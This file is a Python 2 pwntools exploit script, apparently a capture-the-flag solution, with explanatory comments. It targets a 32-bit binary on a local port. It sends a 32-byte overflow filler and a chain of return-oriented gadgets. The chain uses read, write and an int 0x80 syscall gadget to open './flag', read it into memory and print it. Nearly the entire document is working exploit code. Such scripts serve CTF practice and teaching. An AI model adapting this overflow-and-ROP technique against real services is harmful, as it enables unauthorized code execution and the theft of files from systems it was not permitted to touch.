from pwn import *

# Addresses taken from the original script (target binary laid out at 0x08048000).
# Names are kept descriptive; the original used lowercase locals that shadowed
# pwntools' own read()/write() helpers.
START = 0x080480d8          # entry point; used as the "return into" address between frames
READ = 0x0804811d
WRITE = 0x08048135
ADD_ESP_30H = 0x080481b8    # original name: addesp30h
MOV_EBX_ECX_EDX_INT80H = 0x08048122  # original name: mov_ebcdx_int80h
BUF1 = 0x08049100
BUF2 = 0x08049200

# Bytes consumed before the saved return address is reached.
FILLER = 'a' * 32


def _rop_frame(*words):
    """Return FILLER followed by each word.

    Integers are packed as 32-bit little-endian via pwntools' p32(); str
    arguments are appended verbatim. This relies on Python 2 semantics, where
    p32() returns str and concatenates with the str literals used here.
    """
    return FILLER + ''.join(w if isinstance(w, str) else p32(w) for w in words)


io = remote('127.0.0.1', 6666)
raw_input('stop...')

# Frame: [READ][START][0][BUF1][50] -- presumably read(0, BUF1, 50), then return to START.
io.send(_rop_frame(READ, START, 0, BUF1, 50))
io.send('./flag\x00')

# Frame: [START][0xdeadbeaf][MOV_EBX_ECX_EDX_INT80H][START][BUF1].
# 0xdeadbeaf looks like a placeholder word; register setup is assumed from the
# gadget's name and not verified here.
io.send(_rop_frame(START, 0xdeadbeaf, MOV_EBX_ECX_EDX_INT80H, START, BUF1))
io.send(_rop_frame(START, 'a' * 16))
io.send(_rop_frame(START, 'a' * 16))

# Frame: [READ][ADD_ESP_30H][0][BUF2][50] -- read into BUF2, then return into the stack-adjust gadget.
io.send(_rop_frame(READ, ADD_ESP_30H, 0, BUF2, 50))
io.send('12345')

# Frame: [READ][START][7][BUF2][50] then [WRITE][START][1][BUF2][50].
# fd 7 is presumably the descriptor obtained earlier; 1 is stdout.
io.send(_rop_frame(READ, START, 7, BUF2, 50))
io.send(_rop_frame(WRITE, START, 1, BUF2, 50))

io.interactive()